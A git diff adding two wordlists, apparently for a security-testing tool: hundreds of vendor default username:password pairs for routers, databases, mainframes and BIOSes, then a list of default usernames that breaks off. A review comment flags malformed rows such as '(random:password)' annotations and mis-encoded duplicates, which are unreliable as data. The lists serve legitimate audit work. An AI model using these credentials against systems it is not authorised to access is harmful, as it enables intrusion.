+kermit:kermit +admin:x-admin +MGR:HPDESK +:9999 +root:ROOT500 +admin:my_DEMARC 
+volition:volition +GlobalAdmin:GlobalAdmin +:4getme2 +LUCENT01:UI-PSWD-01 +admin:2222 +LUCENT02:UI-PSWD-02 +MANAGER:TCH +adminstat:OCS +desknorm:password +IntraStack:Asante +OPERATOR:SYS +MGR:COGNOS +:Fireport +:ILMI +maint:maintpw +supervisor:supervisor +e500:e500changeme +admin:mu +MANAGER:COGNOS +deskalt:password +admin:OCS +bbsd-client:NULL +cust:custpw +admin:noway +tiara:tiaranet +bcms:bcmspw +:TANDBERG +m1122:m1122 +telco:telco +superuser: +xd:xd +dhs3pms:dhs3pms +VNC:winterm +craft:craftpw +maint:rwmaint +anonymous:any@ +login:access +browse:looker +customer:none +cisco:cisco +adminstrator:changeme +FIELD:MANAGER +:1234admin +FIELD:MGR +ftp_nmc:tuxalize +me: +iclock:timely +echo:User +ADVMAIL:HPOFFICE:DATA +login:1111 +login:8429 +Administrator:manage +:Babylon +admin:hagpolm1 +root:12345 +scmadmin:scmchangeme +user:tivonpw +sysadm:Admin +Administrator:password +admin:administrator +installer:installer +webadmin:webadmin +ftp_inst:pbxk1064 +DDIC:19920706 +:pento +admin:NetSurvibox +SYSTEM:D_SYSTPW +draytek:1234 +:3477 +operator:$chwarzepumpe +administrator:asecret +EARLYWATCH:SUPPORT +:10023 +Manager:Admin +super.super: +ftp_oper:help1954 +corecess:corecess +superuser:123456 +admin:Password +super.super:master +admin:Protector +SYSTEM:MANAGER +webadmin:1234 +install:secret +FIELD:HPWORD:PUB +admin:12345 +admin:symbol +weblogic:weblogic +Admin:1988 +system/manager:sys/change_on_install +root:3ep5w2u +:8111 +:jannie +End:User:123 +none:0 +d.e.b.u.g:User +admin:tomcat +target:password +Administrator:pilou +MD110:help +Administrator:3ware +:ANYCOM +tiger:tiger123 +adminttd:adminttd +admin:asante +admin:smallbusiness +admin:netscreen +FIELD:HPP187:SYS +guest:User +maint:ntacdmax +admin:w2402 +wlseuser:wlsepassword +SAPCPIC:admin +ftp_admi:kilo1987 +admin:articon +mtcl: +default.password: +admin:michelangelo +manager:changeme +root:Mau'dib +:Serial:Num +root:ggdaseuaimhrke +7:maintain +2:syslib +ADMIN:admin +system:weblogic +Administrator:ggdaseuaimhrke +ADMIN: 
+itsadmin:init +PUBSUB:PUBSUB +admin:demo +system:manager +sys:sys +CTXSYS:CTXSYS +ftp: +bill:bill +192.168.1.1:60020:@dsl_xilno +FIELD: +admin:dmr99 +setpriv:system +GUEST:GUEST +SAP*:06071992 +operator:1234 +t3admin:Trintech +hello:hello +supervisor: +CISCO15:otbu+1 +1.79:Multi +:babbit +mso:w0rkplac3rul3s +Telecom:Telecom +qsysopr:qsysopr +admin:TANDBERG +admin:imss7.0 +:nokia +APPS:APPS +Developer:isdev +mail:mail +admin:draadloos +qsecofr:qsecofr +11111:x-admin +:default.password +Service:5678 +enable:cisco +netadmin:nimdaten +Polycom:456 +admin:P@55w0rd! +admin:1234admin +root:par0t +any:system +db2fenc1:db2fenc1 +johnson:control +2:maintain +isp:isp +demos: +QSRV:QSRV +root:iDirect +MDSYS:MDSYS +Admin:123456 +2:manager +vpasp:vpasp +TEST:TEST +:Telecom +QSECOFR:QSECOFR +adm:none +:2501 +1:syslib +system:security +admin:leviton +!root:blank +informix:informix +root:mpegvideo +5:games +root:0P3N +engmode:hawk201 +scout:scout +qpgmr:qpgmr +admin:admin000 +ADSL:expert03 +cisco: +images:images +admin:security +admin:surecom +Gearguy:Geardog +:symantec +comcast: +admin:adslroot +1:manager +Demo: +:xyzzy +Administrator:adaptec +system:system +SAP*:PASS +serial#:serial# +BACKUP:BACKUP +stratacom:stratauser +root:rootme +6.x: +root:!root +webadmin:webibm +:riverhead +mary:password +COMPANY:COMPANY +SYS:SYS +DSL:DSL +Jetform: +none:amber +eagle:eagle +ROUTER: +root:brightmail +admin:pass +:HEWITT:RAND +ods:ods +siteadmin:toplayer +admin:OkiLAN +root:rootpass +Alphanetworks:wrgg15_di524 +:x40rocks +:nokai +Admin1:Admin1 +field:field +Admin:admin +Admin:ImageFolio +:iolan +:manager +admin:pfsense +janta:sales:janta211 +servlet:manager +username:password +citel:password +Replicator:iscopy +SYSMAN:OEM_TEMP +1:operator +SYSTEM:SYSTEM +administrator:RSAAppliance +master:themaster01 +Admin:1234 +2:operator +SUPERUSER:ANS#150 +admin:passwort +cn=orcladmin:welcome +30:games +maintainer:admin +setup: +:hello +admin:NetSeq +BRIO_ADMIN:BRIO_ADMIN +:citel +internal:oracle 
+CQSCHEMAUSER:PASSWORD +root:kn1TG7psLu +SYS:SYSPASS +:lkwpeter +DEV2000_DEMOS:DEV2000_DEMOS +FSFTASK1: +checkfs:checkfs +BACKUP: +USER1:USER1 +root:TENmanUFactOryPOWER +SQLDBA: +root:resumix +HELP:HELP +toor:logapp +SYS:0RACLE9 +SYS:0RACLE8 +:57gbzb +!root:none +qsrvbas:qsrvbas +SYSADMIN: +EZsetup: +Administrator:1234 +:sldkj754 +BATCH: +STRAT_USER:STRAT_PASSWD +Administrator:19750407 +:User +user:USERP +primenet:primeos +OEMREP:OEMREP +admin:[^_^] +USER6:USER6 +lynx: +:TTPTHA +powerdown:powerdown +root:Mau’dib +SYSTEM:ORACL3 +$ALOC$: +password: +VOL-0215: +admin:nimda +tomcat:tomcat +REP_MANAGER:DEMO +WinCCConnect:2WSXcder +ALLIN1:ALLIN1 +DIRMAINT: +eqadmin::Serial:port:only:equalizer +sysadm:sysadmpw +QSRVBAS:QSRVBAS +admin:ip305Beheer +debug:tech +:ACCORD +AQJAVA:AQJAVA +LASERWRITER:LASERWRITER +Administrator:0000 +root:nsi +PERFSTAT:PERFSTAT +apcuser:apc +MBWATCH:MBWATCH +:protection +system_admin: +unix:unix +OWNER:OWNER +NETPRIV:NETPRIV +VSEMAINT: +:AWARD?SW +DEMO:DEMO +tomcat:changethis +SYMPA:SYMPA +REP_OWNER:REP_OWNER +DCL:DCL +FAX: +root:dbps +ARCHIVIST:ARCHIVIST +USER:PASSWORD +VTAMUSER: +LASERWRITER: +VMTAPE: +basisk:basisk +NetLinx:password +OutOfBox:demos:guest:4DGifts:(none:by:default) +none:letmein +NETMGR:NETMGR +DEFAULT:USER +OAS_PUBLIC:OAS_PUBLIC +read: +AP:AP +demos:demos +SYSTEM:Admin +admin:j5Brn9 +MTSSYS:MTSSYS +SYSMAINT:DIGITAL +AUDIOUSER:AUDIOUSER +Joe:hello +IDMS: +:teX1 +admin:allot +$SRV:$SRV +snake: +SYS:0RACLE +ADVMAIL: +Administrator:nicecti +ROOT:ROOT +PRINTER:PRINTER +shutdown: +satan: +:m1link +RDM470: +master:access +:l2 +:l1 +trouble:trouble +fax: +OP1: +admin@example.com:admin +root:trendimsa1.0 +HOST:HOST +ADLDEMO:ADLDEMO +QS_ADM:QS_ADM +bin:sys +:AMI +OPER:OPER +oracle: +jj: +PO7:PO7 +SYSTEM:0RACLE8 +SYSTEM:0RACLE9 +www: +joe:password +:komprie +:123 +MAINT:MAINT +CMSBATCH: +root:toor +CCC: +role1:tomcat +DATAMOVE: +lp: +:AMISETUP +:sp99dd +halt:halt +MSHOME:MSHOME +ISPVM: +crowd­-openid-­server:password +user_editor:demo 
+sedacm:secacm +ROOT: +Admin:3Com +db2admin:db2admin +Airaya:Airaya +supervisor:visor +none:Wireless +SYSDUMP1: +IMEDIA:IMEDIA +:Biostar +install:install +primos_cs:primos +admin:infrant1 +Administrator:Partner +:Administrative +USER_TEMPLATE:USER_TEMPLATE +pnadmin:pnadmin +:h6BB +lpadmin:lpadmin +guest:none +VTAM:VTAM +TRACESVR:TRACE +POSTMASTER:POSTMASTER +MAILER:MAILER +RSCSV2: +QS_WS:QS_WS +:sma +system_admin:system_admin +circ: +Demo:password +:rwa +nobody:nobody +Tasman:Tasmannet +admin:!admin +DISCOVERER_ADMIN:DISCOVERER_ADMIN +VMASMON: +LR-ISDN:LR-ISDN +TURBINE:TURBINE +GL:GL +PO:PO +:AMI_SW +super:superpass +PRINT: +MODTEST:YES +GATEWAY:GATEWAY +root:system +PRIMARY:PRIMARY +both:tomcat +:award.sw +haasadm:lucy99 +pw:pwpw +games:games +DOCSIS_APP:3Com +bbs: +EMP:EMP +Admin:cclfb +postmaster: +SITEMINDER:SITEMINDER +Any:Any +vgnadmin:vgnadmin +RJE:RJE +gonzo: +NEWS:NEWS +sa:Ektron +:Award +AQUSER:AQUSER +UTLBSTATU:UTLESTAT +:AMIAMI +netbotz:netbotz +CTXSYS:CHANGE_ON_INSTALL +xmi_demo:sap123 +:Crystal +:Daewuu +ftp:ftp +ORACACHE:(random:password) +MCUser:MCUser1 +prash:hello +sync: +sysadm:admpw +root:rootadmin +PM:PM +AP2SVP: +master:master +ibm:2222 +ULTIMATE:ULTIMATE +SABRE: +role1:role1 +user_pricer:demo +admin:enhydra +SUPERVISOR:NF +EVENT:EVENT +:xyzall +:rainbow +ADMIN:JETSPEED +SYS:ORACL3 +PORTAL30_SSO_PS:PORTAL30_SSO_PS +FSFADMIN: +OO:OO +WKSYS:WKSYS +OPERATNS:OPERATNS +:ksdjfg934t +UVPIM_: +:merlin +OE:OE +Any:Local:User:Local:User:password +OCITEST:OCITEST +web: +:HLT +ADMINISTRATOR:admin +ESSEX: +:last +CTXSYS: +None:xyzzy +CTXDEMO:CTXDEMO +user_designer:demo +:Admin +:zebra +QDBA:QDBA +role:changethis +LRISDN:LRISDN +tele:tele +WEBCAL01:WEBCAL01 +rsadmin:rsadmin +OMWB_EMULATION:ORACLE +root:alien +WINDOWS_PASSTHRU: +:sanfran +public:ReadOnly:access:secret +:AMIPSWD +MOREAU:MOREAU +fast:abd234 +root:QNX +host:dnnhost +administrator:root +admin:public +SYSTEM:ORACLE +:sertafu +ORDPLUGINS:ORDPLUGINS +SYSWRM: +mail: +:telos +ADMIN:ADMIN 
+administrator:adminpass +savelogs:crash +:ACCESS +SDOS_ICSAP:SDOS_ICSAP +system:adminpwd +BATCH:BATCH +GUEST:GUESTGUEST +SYSMAINT:SYSMAINT +postmaster:postmast +DSSYS:DSSYS +:award_ps +:ZAAADA +MGWUSER:MGWUSER +:NTCIP +OPERATOR: +:hewlpack +TDOS_ICSAP:TDOS_ICSAP +ssp:ssp +EJSADMIN:EJSADMIN +:damin +INGRES:INGRES +DS: +:A.M.I +estheralastruey: +:1322222 +VCSRV:VCSRV +Administrator:storageserver +ssladmin:ssladmin +CLARK:CLOTH +shutdown:shutdown +administrator:1234 +OEMADM:OEMADM +restoreonly:restoreonly1 +quser:quser +PRINTER: +MILLER:MILLER +trmcnfg:trmcnfg +REPORT:REPORT +user_author:demo +:aLLy +dpn:changeme +tour:tour +mountfsys:mountfsys +http: +PROG:PROG +:iwill +openfiler:password +:Public +admin:mp3mystic +RAID:hpt +read:synnet +admin:peribit +STARTER:STARTER +FAXUSER: +GUEST:GUESTGUE +DSA: +:guardone +daemon:daemon +mountsys:mountsys +SYSTEM:ORACLE9 +SYSTEM:ORACLE8 +:gandalf +backuponly:backuponly1 +IVPM1: +:leaves +sysadm:syspw +root:blablabla +:Compleri +USER3:USER3 +OPENSPIRIT:OPENSPIRIT +:spooml +:changeit +:wg +prime:primeos +HPLASER: +:Vextrex +CSPUSER: +qsvr:qsvr +lynx:lynx +SYSCKP: +root:letmein +Sysop:Sysop +user_marketer:demo +IMAGEUSER:IMAGEUSER +root:Password +bsxuser:bsxpass +MASTER:PASSWORD +USER9:USER9 +root:ax400 +OLAPSYS:MANAGER +SYSTEM:OPERATOR +oracle:oracle +root:Mau?dib +:MASTER +root:t00lk1t +rsadmin: +:Daytec +OutOfBox: +:SZYX +:cmaker +:CTX_123 +rje:rje +ODM_MTR:MTRPW +QS_ES:QS_ES +lansweeperuser:mysecretpassword0* +DEMO3: +Username:password +GPLD:GPLD +uucp:uucp +DBSNMP:DBSNMP +VMARCH: +GUEST:TSEUG +SWUSER:SWUSER +root:8RttoTriz +VTAM: +OPERATNS: +Operator:Operator +CHEY_ARCHSVR: +SYS:ORACLE +roo:honey +n.a:guardone +accounting:accounting +backuprestore:backuprestore1 +PRINT:PRINT +:j322 +:Craftr4 +dni:dni +WEBADM:password +iceman: +guru:*3noguru +FAX:FAX +anon:anon +:j256 +USER8:USER8 +root:honey +PORTAL30_SSO_PUBLIC:PORTAL30_SSO_PUBLIC +:589721 +postgres: +WINSABRE:WINSABRE +USERP:USERP +none:public +Admin:shs +SYS:MANAGER 
+IVPM2: +PORTAL30_SSO:PORTAL30_SSO +ALLIN1MAIL:ALLIN1MAIL +POST: +TEMP: +:xo11nE +admin:nms +SYSADM:SYSADM +BATCH1: +me:me +SUPERVISOR:NFI +PROMAIL: +SECDEMO:SECDEMO +ARAdmin:AR#Admin# +sadmin: +ORAREGSYS:ORAREGSYS +VMASSYS: +man: +FROSTY:SNOWMAN +LASER:LASER +tutor: +:?award +root:changethis +DISKCNT: +default:WLAN_AP +SYSERR: +WWW:WWW +VAX:VAX +none:none +:Cable-docsis +PROCAL: +SUPERVISOR:SYSTEM +FAXWORKS: +ibm:password +CTXSYS:UNKNOWN +LDAP_Anonymous:LdapPassword_1 +(any:3:chars):cascade +games: +User:1234 +:Zenith +setup/snmp:setup/nopasswd +DSGATEWAY:DSGATEWAY +AWARD_SW: +CSMIG:CSMIG +:year2000 +umountfsys:umountfsys +:BIGO +root:jstwo +VMS:VMS +dni: +bpel:bpel +viewuser:viewuser1 +admin:ISPMODE +TDISK: +politically:correct +user_analyst:demo +admin:conexant +guest:1234 +root:logapp +admin:ip3000 +RSCS: +COMPIERE:COMPIERE +OSP22:OSP22 +guest1:guest1 +FORSE:FORSE +:lesarotl +factory:factory +bubba:(unknown) +admin:ip20 +admin:ip21 +LASER: +QUSER:QUSER +:AWARD:SW +primeos:prime +admin:tr650 +poll:poll +:j262 +:xljlbj +glftpd:glftpd +:Advance +RMAN:RMAN +mountfs:mountfs +DIRECT: +:console +firstsite:firstsite +:SW_AWARD +IPFSERV: +:snake +Administrator:Gateway +TSUSER:TSUSER +BATCH2: +admin:123123 +:3098z +:cc +snmp:nopasswd +WebAdmin:WebBoard +IBMUSER:SYS1 +SMART: +voadmin:manager +BC4J:BC4J +core:phpreactor +OPERVAX:OPERVAX +Bobo:hello +:Congress +:central +WANGTEK:WANGTEK +disttech:etas +OWA:OWA +USER2:USER2 +jasperadmin:jasperadmin +FIELD:DIGITAL +root:uClinux +guest:guestgue +FAXUSER:FAXUSER +WINSABRE:SABRE +VMBSYSAD: +admin:ip400 +PVM: +ctb_admin:sap123 +:AMI.KEY +:AMI.KEZ + :ANYCOM +USER_TEMPLATE: +DEMO4: +:inuvik49 +QSRV:11111111 +qsrv:qsrv +superdba:admin +PORTAL30:PORTAL31 +PORTAL30:PORTAL30 +XPRT:XPRT +Crowd:password +User:19750407 +18364: +:zjaaadc +ilom-admin:ilom-admin +rdc123:rdc123 +sysopr:sysopr +tasman:tasmannet +SYSTEM:0RACLE8I +:Cisco:router +admin:store +:SER +blank:blank +ADMIN:PASSWORD +admin:IP:address +WEBREAD:WEBREAD +ODM:ODM 
+11111111:11111111 +prime:prime +AURORA$ORB$UNAUTHENTICATED:INVALID +ADAMS:WOOD +root:vertex25 +sys:bin +lp:lineprin +Craft:crftpw +www:www +postgres:dbpass +rfmngr:$rfmngr$ +sync:sync +WANGTEK: +:1988 +MAINT: +SYSTEST_CLIG:SYSTEST +user:user0000 +user_approver:demo +ilom-operator:ilom-operator +Nice-admin:nicecti +:HELGA-S +answer: +NETNONPRIV:NETNONPRIV +nuucp: +CIDS:CIDS +VASTEST: +primenet:primenet +redline:redline +:rw +spcl:0000 +admin:muze +MBMANAGER:MBMANAGER +webmaster: +APPLSYS:FND +:ro +WINDOWS_PASSTHRU:WINDOWS_PASSTHRU +USER4:USER4 +hqadmin:hqadmin +UOMNI_: +FIELD:TEST +sys:system +Admin:123qwe +VMUTIL: +POST:BASE +:dn_04rjc +uucpadm:uucpadm +halt: +FAXWORKS:FAXWORKS +admin:password1 +EXFSYS:EXFSYS +4Dgifts: +JMUSER:JMUSER +admin:imsa7.0 +SUPERVISOR:NETFRAME +CIS:CIS +UNITY_: +:ciscofw +HLW:HLW +admin:brocade1 +pwrchute:pwrchute +:setup +:Tiny +IDMSSE: +postgres:svcPASS83 +NSA:nsa +!root:!ishtar +admin:blank +root:NeXT +TELEDEMO:TELEDEMO +:AMIDECOD +recover:recover +TRAVEL:TRAVEL +lexar: +:efmukl +viewer: +LIBRARY: +admin:raritan +PO8:PO8 +root@localhost:root +NAMES:NAMES +secofr:secofr +PDMREMI: +:biostar +MGE:VESOFT +USER7:USER7 +OWA_PUBLIC:OWA_PUBLIC +questra:questra +builtin:builtin +SFCNTRL: +SAP*:6071992 +boss:boss +anonymous:password +:isolation +:Q54arwms +PLEX:PLEX +OLAPDBA:OLAPDBA +:g6PJ +OLAPSVR:INSTANCE +user_expert:demo +root:pixmet2003 +Bhosda:Lund +TEST: +qsvr:ibmcel +CMSBATCH:CMSBATCH +:ABCD +gropher: +:AM +administrator:admin +:condo +:Toshiba +:familymacintosh +TAHITI:TAHITI +NEWINGRES:NEWINGRES +:AMI?SW +:mMmM +man:man +VM3812: +root:powerapp +ibm:service +VIF_DEVELOPER:VIF_DEV_PWD +ADMIN:WELCOME +Admin:Barricade +joeuser:joeuser +system:isp +IPC: +HELPDESK:HELPDESK +wlpisystem:wlpisystem +TSAFVM: +prtgadmin:prtgadmin +SYSTEM:CHANGE_ON_INSTALL +:CONCAT +:t0ch88 +webmaster:webmaster +:djonet +ADMIN:changeme +Any: +:Compaq +UAMIS_: +theman:changeit +CISINFO:CISINFO +mobile:dottie +QS_CB:QS_CB +CDEMORID:CDEMORID +tech:nician +DEMO2: 
+administrator:none +SYS:MANAG3R +End:User:7936 +PORTAL30_PUBLIC:PORTAL30_PUBLIC +sysadmin:nortel +SYS:D_SYSTPW +SYSTEM:SYSPASS +Guest:blank +User:User +MDDEMO_CLERK:CLERK +FIELD:FIELD +Admin:SECRET123 +Guest:Guest +PHANTOM: +admin:amigosw1 +:xmux +write: +ADMINISTRATOR:SENTINEL +system:field +:ducati900ss +qsecofr:22222222 +:lkw:peter +:awkward +:TzqF +SYSTEST_CLIG:SYSTEST_CLIG +ODS:ODS +admin:axis2 +BLAKE:PAPER +TSDEV:TSDEV +PRODBM: +admin:letmein +:joh316 +dos:dos +login:0000 +APL2PP: +system:hdms +admin:phplist +god1:12345 +admin:novell +CICSUSER:CISSUS +22222222:22222222 +root:passw0rd +user_publisher:demo +OSE$HTTP$ADMIN:(random:password) +def:trade +SuperUser:kronites +QS_CBADM:QS_CBADM +SYSA:SYSA +:00000000 +STUDENT:STUDENT +Draytek:1234 +SMDR:SECONDARY +EREP: +VSEMAN: +:OOOOOOOO +primos_cs:prime +demo: +fwadmin:xceladmin +:j64 +MTS_USER:MTS_PASSWORD +:AWARD_SW +AQDEMO:AQDEMO +private:ReadWrite:access:secret +:GWrv +:MagiMFP +:SnuFG5 +IS_$hostname:IS_$hostname +HPSupport:badg3r5 +ORASSO:ORASSO +GATEWAY: +:t0ch20x +CVIEW: +SH:SH +:zeosx +XXSESS_MGRYY:X#1833 +:wodj +:FOOBAR +SYSMAN:SYSMAN +VMMAP: +admin:urchin +PORTAL30_DEMO:PORTAL30_DEMO +Ezsetup: +QS_CS:QS_CS +administrator:PlsChgMe! 
+CMSUSER: +:MCUrv +DEMO1: +admin:adminadmin +userNotUsed:userNotU +:AMI~ +root:ibm +ncadmin:ncadmin +TESTPILOT:TESTPILOT +:Polrty +fg_sysadmin:password +UETP:UETP +QS:QS +DBI:MUMBLEFRATZ + :ILMI +SYSTEM:SYS +JWARD:AIROPLANE +APPS_MRC:APPS_MRC +:uboot +Moe:hello +SENTINEL:SENTINEL +admin:netgear1 +Yak:asd123 +PDP11:PDP11 +:aammii +Flo:hello +SLIDE:SLIDEPW +root:bagabu +primeos:primeos +:Spacve +:256256 +INFO:INFO +checkfsys:checkfsys +PRODCICS:PRODCICS +:foolproof +:AWARD_PW +MXAGENT:MXAGENT +SYSTEM:ORACLE8I +admin:no:password +VMTLIBR: +POWERCARTUSER:POWERCARTUSER +VMBACKUP: +CPNUC: +:QDI +:shiva +distrib:distrib0 +SUPERVISOR:SUPERVISOR +SYSMAINT:SERVICE +MIGRATE:MIGRATE +CDEMOUCB:CDEMOUCB +system:prime +QSRV:22222222 +:c +OLTSEP: +sysbin:sysbin +signa:signa +autocad:autocad +:SWITCHES_SW +WEBDB:WEBDB +daemon: +:aPAf +ncrm:ncrm +SAMPLE:SAMPLE +:1 +HCPARK:HCPARK +ALLINONE:ALLINONE +nm2user:nm2user +SAVSYS: +IIPS: +PATROL:PATROL +:technolgi +:MBIU0 +mailadmin:secret +adm:adm +TMSADM: +tutor:tutor +ESubscriber: +CHEY_ARCHSVR:CHEY_ARCHSVR +write:synnet +software:software +admin:welcome +god2:12345 +bbs:bbs +:Dell +disttech:disttech +FSFTASK2: +:zbaaaca +:prost +ORDSYS:ORDSYS +Administrator:administrator +:1234567890 +gopher:gopher +PSFMAINT: +SYSTEM:MANAG3R +:RM +:s!a@m#n$p%c +EAdmin: +12345:12345 +DECNET:DECNET +OPERATIONS:OPERATIONS +$system: +REP_OWNER:DEMO +PANAMA:PANAMA +LIBRARIAN:SHELVES +SYSTEM:0RACLE +fal: +4Dgifts:4Dgifts +:biosstar +NETSERVER:NETSERVER +:tiny +root:TANDBERG +POWERCHUTE:APC +USER5:USER5 +GPFD:GPFD +:12345678 +blank:admin +QS_OS:QS_OS +sysadm:admin +REPADMIN:REPADMIN +Administrator:12345678 +0:0 +DEMO8:DEMO8 +DEMO9:DEMO9 +CDEMO82:CDEMO82 +admin:boca:raton +Administrator:vision2 +administrator:0 +umountsys:umountsys +snmp:snmp +Username:PASSWORD +volition: +USER0:USER0 +CDEMOCOR:CDEMOCOR +SYSTEST:UETP +Rodopi:Rodopi +DECNET:NONPRIV +user_checker:demo +:tatercounter2000 +qserv:qserv +:ESSEX:or:IPC +AQ:AQ +support: +SAPR3:SAP +VRR1:VRR1 
+fastwire:fw +admi:admin +FINANCE:FINANCE +WinCCAdmin:2WSXcder +ESTOREUSER:ESTORE +fax:fax +VIRUSER:VIRUSER +LINK:LINK +APPLSYSPUB:FNDPUB +:BIOS +SYS:ORACLE8 +SYS:ORACLE9 +overseer:overseer +checksys:checksys +umountfs:umountfs +DBDCCICS:DBDCCIC +Admin:password +:x6zynd56 +TOAD:TOAD +root:mozart +ntpupdate:ntpupdate +root:router +MDDEMO_MGR:MGR +ARCHIVIST: +SUPERVISOR:HARRIS +:11111 +billy-bob: +lp:bin +DECMAIL:DECMAIL +alien:alien +admin:dnnadmin +nsroot:nsroot +AdvWebadmin:advcomm500349 +dvstation:dvst10n +SERVICECONSUMER1:SERVICECONSUMER1 +MMO2:MMO2 +qsecofr:11111111 +NOC:NOC +WWWUSER:WWWUSER +root::Serial:port:only: +SAP:SAPR3 +root:t0talc0ntr0l4! +NEVIEW: +MAIL: +ODSCOMMON:ODSCOMMON +fal:fal +pixadmin:pixadmin +ripeop: +PENG: +:BIOSPASS +netlink:netlink +L2LDEMO:L2LDEMO +OUTLN:OUTLN +12.x: +scott:tiger:or:tigger +:toshy99 +dbase:dbase +:nz0u4bbe +fam:fam +:bell9 +Oper:Oper +RMAIL:RMAIL +administrator:19750407 +FND:FND +admin:exinda +PRIV:PRIV +admin:barney +SETUP: +:biodata +:24Banc81 +news:news +VSEIPO: +:j09F +pw:pw +GUEST: +ilon:ilon +:award_? 
+SYS:0RACLE39 +SYS:0RACLE38 +DEFAULT:DEFAULT +:AMI!SW +PLSQL:SUPERSECRET +root:alpine +politcally:correct +18140815:18140815 +APPUSER:APPUSER +SUPERVISOR: +CENTRA:CENTRA +LBACSYS:LBACSYS +:alfarome +PDP8:PDP8 +SFCMI: +administrator:*:*:# +lpadm:lpadm +Test:Everything: +bewan:bewan +:2580 +DIP:DIP +:Sxyz +mfd:mfd +MDDEMO:MDDEMO +:intermec +:589589 +SWPRO:SWPRO +DES:DES +root:fibranne +Coco:hello +GCS: +rodopi:rodopi +:touchpwd= +Scott:Tiger +Admin5:4tugboat +admin:funkwerk +ANDY:SWORDFISH +DESQUETOP: +nobody: +Manager:657 +:mysweex +SYSTEM:SYSLIB +NETCON:NETCON +JONES:STEEL +author:author +MOESERV: +web:web +tech:User +PUBSUB1:PUBSUB1 +SYS:D_SYSPW +CATALOG:CATALOG +:IBM +:Guest +SQLUSER: +RE:RE +REPORTS_USER:OEM_TEMP +MFG:MFG +POST:POST +HPLASER:HPLASER +HR:HR +VIDEOUSER:VIDEO:USER +DBA:SQL +:CMOSPWD +guest1:guest +superuser:asante +SYSTEM:0RACLE38 +SYSTEM:0RACLE39 +AUTOLOG1: +dadmin:dadmin +AURORA$JIS$UTILITY$: +wlcsystem:wlcsystem +news: +CPRM: diff --git a/data/wordlists/default_users_for_services_unhash.txt b/data/wordlists/default_users_for_services_unhash.txt new file mode 100644 index 0000000000..c36f0e7e2b --- /dev/null +++ b/data/wordlists/default_users_for_services_unhash.txt 
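Review bot: Several rows added to default_userpass_for_services_unhash.txt are scraped annotations or encoding damage rather than user/password pairs, so in a default-credential audit they only add failed logins, log noise and lockout risk. Examples are `ORACACHE:(random:password)`, `OutOfBox:demos:guest:4DGifts:(none:by:default)`, `bubba:(unknown)`, `admin:no:password` and `eqadmin::Serial:port:only:equalizer`. `crowd­-openid-­server:password` appears to contain soft hyphens, and `root:Mau'dib`, `root:Mau’dib` and `root:Mau?dib` look like one entry in three encodings. I would drop the annotation rows, keep the single ASCII form `root:Mau'dib`, and strip the leading blank from ` :ANYCOM` and ` :ILMI`. The users hunk that follows for default_users_for_services_unhash.txt carries the same kind of fragments (`(any`, `End`, `192.168.1.1`, `6.x`, `12.x`), so the cleanup applies there too.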
@@ -0,0 +1,915 @@ +admin + +root +Administrator +sysadm +tech +operator +guest +security +debug +manager +service +!root +user +netman +super +diag +Cisco +Manager +DTA +apc +User +Admin +cablecom +adm +wradmin +netscreen +sa +setup +cmaker +enable +MICRO +login +write +monitor +netopia +op +adminview +sysadmin +echo +craft +maint +comcast +CSG +readonly +manuf +cusadmin +smc +sweex +disttech +su +poll +SYSDBA +anonymous +support +recovery +USERID +eng +administrator +NETWORK +JDE +Guest +rwa +USER +test +lp +ro +MAIL +ami +hsa +system +MGR +ADMINISTRATOR +FIELD +PBX +HELLO +hscroot +1502 +superuser +netrangr +readwrite +piranha +wlse +l3 +none +naadmin +public +NETOP +MANAGER +demo +D-Link +l2 +rw +cgadmin +storwatch +vcr +OPERATOR +MDaemon +jagadmin +enquiry +at4400 +davox +PFCUser +aaa +topicalt +admin2 +1234 +nms +client +sys +field +deskman +SYSADM +superadmin +pmd +GEN2 +ADMN +Factory +PRODDTA +tellabs +spcl +dadmin +helpdesk +dhs3mt +install +adfexc +IntraSwitch +manage +superman +SPOOLMAN +ADVMAIL +vt100 +PSEAdmin +patrol +teacher +PCUSER +Any +RSBCMON +cellit +inads +halt +locate +TMAR#HWMT8007079 +rapport +xbox +device +NICONEX +acc +31994 +bcim +websecadm +blue +topicnorm +supervisor +ccrusr +266344 +telecom +GEN1 +SSA +HTTP +mtch +bciim +browse +hydrasna +deskres +bbsd-client +replicator +intel +radware +intermec +mlusr +init +e250 +Polycom +temp1 +mac +3comcso +RMUser1 +WP +NAU +rcust +mtcl +topicres +bcnas +adminuser +Root +cac_admin +mediator +Anonymous +kermit +volition +GlobalAdmin +LUCENT01 +LUCENT02 +adminstat +desknorm +IntraStack +e500 +deskalt +cust +tiara +bcms +m1122 +telco +xd +dhs3pms +VNC +customer +cisco +adminstrator +ftp_nmc +me +iclock +scmadmin +installer +webadmin +ftp_inst +DDIC +SYSTEM +draytek +EARLYWATCH +super.super +ftp_oper +corecess +weblogic +system/manager +End +d.e.b.u.g +target +MD110 +tiger +adminttd +wlseuser +SAPCPIC +ftp_admi +default.password +7 +2 +ADMIN +itsadmin +PUBSUB +CTXSYS +ftp +bill +192.168.1.1 +setpriv 
+GUEST +SAP* +t3admin +hello +CISCO15 +1.79 +mso +Telecom +qsysopr +APPS +Developer +mail +qsecofr +11111 +Service +netadmin +any +db2fenc1 +johnson +isp +demos +QSRV +MDSYS +vpasp +TEST +QSECOFR +1 +informix +5 +engmode +scout +qpgmr +ADSL +images +Gearguy +Demo +serial# +BACKUP +stratacom +6.x +mary +COMPANY +SYS +DSL +Jetform +eagle +ROUTER +ods +siteadmin +Alphanetworks +Admin1 +janta +servlet +username +citel +Replicator +SYSMAN +master +SUPERUSER +cn=orcladmin +30 +maintainer +BRIO_ADMIN +internal +CQSCHEMAUSER +DEV2000_DEMOS +FSFTASK1 +checkfs +USER1 +SQLDBA +HELP +toor +qsrvbas +SYSADMIN +EZsetup +BATCH +STRAT_USER +primenet +OEMREP +USER6 +lynx +powerdown +$ALOC$ +password +VOL-0215 +tomcat +REP_MANAGER +WinCCConnect +ALLIN1 +DIRMAINT +eqadmin +QSRVBAS +AQJAVA +LASERWRITER +PERFSTAT +apcuser +MBWATCH +system_admin +unix +OWNER +NETPRIV +VSEMAINT +DEMO +SYMPA +REP_OWNER +DCL +FAX +ARCHIVIST +VTAMUSER +VMTAPE +basisk +NetLinx +OutOfBox +NETMGR +DEFAULT +OAS_PUBLIC +read +AP +MTSSYS +SYSMAINT +AUDIOUSER +Joe +IDMS +$SRV +snake +ROOT +PRINTER +shutdown +satan +RDM470 +trouble +fax +OP1 +admin@example.com +HOST +ADLDEMO +QS_ADM +bin +OPER +oracle +jj +PO7 +www +joe +MAINT +CMSBATCH +CCC +role1 +DATAMOVE +MSHOME +ISPVM +crowd­-openid-­server +user_editor 